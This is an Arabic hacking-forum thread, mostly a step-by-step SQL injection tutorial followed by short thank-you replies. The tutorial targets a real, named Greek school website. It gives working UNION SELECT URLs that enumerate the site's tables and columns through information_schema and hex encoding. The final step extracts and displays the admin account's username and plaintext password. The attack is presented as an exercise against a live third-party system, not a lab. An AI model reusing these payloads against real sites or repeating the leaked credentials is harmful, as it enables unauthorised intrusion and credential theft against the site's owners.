![]() |
تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره السلام عليكم ورحمة الله وبركاته المرحله الاخيره في استغلال ثغرة sql injaction ==================== الشرح مقدم لأاخي هيثم وباقي اعضاء المنتدى الاكارم ================= بسم الله الرحمن الرحيم كنا قد تناولنا بدرس الامس استغلال الامر كود: union+select كود: dsasummercamp.edu.gr/news.php?id=123 ظهر معنا باستخدام هذا الموقع ان اصدار قاعدته هو 5.1.63 ولنتعلم شيء يا شباب وهو ان كل قاعده يبدا اصدارها بالرقم 5 تحتوي على قاعده اضافيه يسجل فيها معلومات الدوخول الخاصه بالادمن ومنها كلمة سره وايميله واسم المستخدم الخاص به طيب كيف ..! هذا ما سنشاهده ونتعرف عليه الان اولا علي ان استخدم امر لرؤية محتوى هذه القاعده التي يحبها محترفو الهكر ويحبون التعامل معها الان ركزوا معي سنضع هذا الامر مكان العمود المصاب كود: Group_concat(table_name) ثم بعد ترقيم الاعداد نستخدم هذا الامر : كود: +From+information_schema.tables+where+table_schema=database() عندما نضع امر كود: Group_concat(table_name) وعندما كتبنا الامر: كود: +From+information_schema.tables+where+table_schema=database() وكلمة information تعني : معلومات وكلمةschema تعني :احتياطيه وكلمة from تعني من وكلمةtable تعني جدول حيث سيصبح الرابط على الشكل التالي : كود: http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,Group_concat%28table_name%29,3,4,5+From+information_schema.tables+where+table_schema=database%28%29 انظروا هذه هي الجداول : كود: auth,categories,files_en,files_gr,intros_en,intros_gr,issue_contents_en,issue_contents_gr,link_categories,links,news_en,news_gr,pg,pg_categ,pg_photos,templates اين جدول الادمن ؟؟؟ انظروا لا يوجد جدول فيه كلمة ادمن وهذا نادر جدا طيب كل له اسم يدل على محتواه مثلا : هذا files_en ملفات انكليزيه وهذا files_gr ملفات المانيه وهذا للقوالب templates وهذا للاخبار news_gr وهذاlinks للروابط طيب ماذا لو اردت ان اعرف محتوى هذا الجدول والذي اسمه auth يجب اولا ان اذهب لأي موقع تشفير لكي يشفر لي هذا الجدول اليكم هذا الموقع http://www.swingnote.com/tools/texttohex.php انا قمت بتشفير الكلمه واصبحت على الشكل التالي 61757468 لكن اذا اردنا ان نستخدم اي كلمه مشفره بالhex يجب ان نضع قبلها علامة 0x لما شفرنا هذه الكلمه او هذا الجدول الجواب لأننا سوف نقرأ ما بداخله من عواميد .... كيف ؟!! تعالوا نعرف اولا بدل العمود المصاب نضع كود: Group_concat(column_name) كود: Group_concat(table_name) كود: +From+information_schema.columns+where+table_name=0xالجدول مشفرا كود: http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,Group_concat%28column_name%29,3,4,5+From+information_schema.columns+where+table_name=0x61757468 كود: id,onoma,username,pass,type,published انظر الصورة طيب والان علي ان اقرأ محتوى هذه العواميد ودفعه واحد كيف ؟ كيف!! سأضع هذه الجداول في الامر كود: concat() كود: group-concat() اي عمود اريده من هذه الاعمده التي حصلت عليها وهي : كود: id,onoma,username,pass,type,published كود: 0x3a3a وتعني : كود: :: لقد كان auth واسم القاعده كان : itis_dsa حسننا كيف سنرتب ذلك وكيف سيكون الامر سنضع الاعمده التي نريدها مكان العمود المصاب وما يهمني هو عمود PASS و USERNAME وعليه سيكونان هكذا كود: concat(username,0x3a3a,pass) كود: + كود: http://dsasummercamp.edu.gr/news.php?id=-123+union+select+1,concat%28username,0x3a3a,pass%29,3,4,5+From+itis_dsa.auth-- هذه هي تم قراءة العمود كود: thecube::pelopidas في احتراف هذه الثغرة و اود ان اقول لكم ان هناك اشياء كثيره لكن هذه هي الاساسيات واتمنى ان تشاهدوا ووتوغلوا اكثر في شروحات الاخوة المحترفين لكم تحياة اخوكمthe punisher انتهى الدرس الذي اخذ من وقتي ساعتين ونصف وها هوا الاذان يرفع في السماء مشيرا لموعد صلاة العشاء استودعكم الله |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره باراك الله فيك موفق باذن الله |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره تسلم يا غالى بالتوفيق:icon31: |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره يعطيك الف عافية يالغالي تم تقييمك |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره اهلا وسهلا بالشباب .....شكرا لمروركم الكريم ...وفقكم الله |
رد: تفضل يا اخي Hitham شرح لاكتشاف الثغرةsql...المرحلة الثالثه والاخيره باراك الله فيك |
الساعة الآن 07:24 PM |
[ vBspiders.Com Network ]